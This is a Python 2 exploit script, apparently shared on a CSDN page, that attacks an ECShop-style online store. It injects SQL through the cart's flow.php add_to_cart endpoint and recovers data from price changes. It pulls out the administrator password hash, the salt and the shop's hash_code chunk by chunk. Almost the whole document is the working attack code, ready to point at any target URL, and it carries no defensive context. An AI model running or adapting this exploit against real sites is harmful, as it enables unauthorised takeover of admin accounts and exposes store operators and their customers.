#coding=gbk
#/usr/bin/env python
import urllib2,sys
import cookielib
import requests
import re,binascii
attackurl=raw_input("输入漏洞网站:")
attackid=raw_input("输入物ID:")
attackprice=raw_input("输入物品价格:")
def postdata(url,data="",regex=""):
  r=s.post(url,data)
  result=r.text
  print result
  if regex !="":
    reg=re.findall(regex, result)
    #print regex
    #print reg
    if reg:
      return result,reg[0]
    else:
      return result
def infomation(url):
  global spec,goods,price
  goods=re.findall(r'id=(\d{1,5})',url)
  spec=postdata(url,regex=r"spec_value_(\d{1,10})")
def sqlinjection(sql):
  post_data={"goods":"""{"quick":1,"spec":["%s","%s"],"goods_id":%s,"number":"1","parent":0}"""%(spec[1],sql,goods[0])}
  url=attackurl + "/flow.php?step=add_to_cart"
  price=postdata(url,post_data,regex=ur"总计金额\s\S(\d{1,10})")
  url=attackurl + "/flow.php"
  goods_number=postdata(url,regex=r"goods_number\[.*\]")
  goods_num=goods_number[1]
  data={"%s"%(goods_num):"1","submit":"%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5","step":"update_cart"}
  update_cart=postdata(url,data,regex=ur"购物车更新成功")
  new_price=postdata(url,regex=ur"购物金额小计\s\S(\d{1,10})")
 #print new_price,price,goods_number
  if new_price[1]:
    #res_price=int(new_price[1])-int(price[1])
    res_price=int(new_price[1])-int(attackprice)
    #print res_price
    passwd=binascii.a2b_hex(str(res_price))
#清空购物车
    url=url + "/flow.php?step=clear"
    postdata(url)
    return passwd
def get_salt():
  sql="2') and 1=2 union select hex(substring(ec_salt from 1 for 4)) from ecs_admin_user where user_id=1 order by attr_price desc #"
  print "salt is : " + sqlinjection(sql)
def get_hash_code():
  passwd=""
  for x in range(0,8):
    sql="2') and 1=2 union select hex(substring(value from %d for 4)) from ecs_shop_config where code='hash_code' order by attr_price desc #"%(1+x*4)
    passwd+=sqlinjection(sql)
    print "hash_code is : " + passwd
def get_admin_pass():
  global passwd
  passwd=""
  for x in range(0,8):
   sql="2') and 1=2 union select hex(substring(password from %d for 4)) from ecs_admin_user where user_id=1 order by attr_price desc #"%(1+x*4)
   passwd+=sqlinjection(sql)
   print "admin_password is : " + passwd
  get_salt()
  get_hash_code()
if __name__ == "__main__":
    s = requests.Session()
    url=attackurl+"/goods.php?id="+attackid ##如果不存在 就要修改下id
    infomation(url)
    print "开始破解...(时间有点长,请耐心等待)"
    get_admin_pass()

Logo
CSDN学习社区

CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!

更多推荐

cover

用 OpenAI Assistants 做大模型应用开发

avatar CSDN学习社区
cover

1 小时解读鸿蒙 10 大热点问题

avatar CSDN学习社区
cover

1 小时解读鸿蒙 10 大热点问题

avatar CSDN学习社区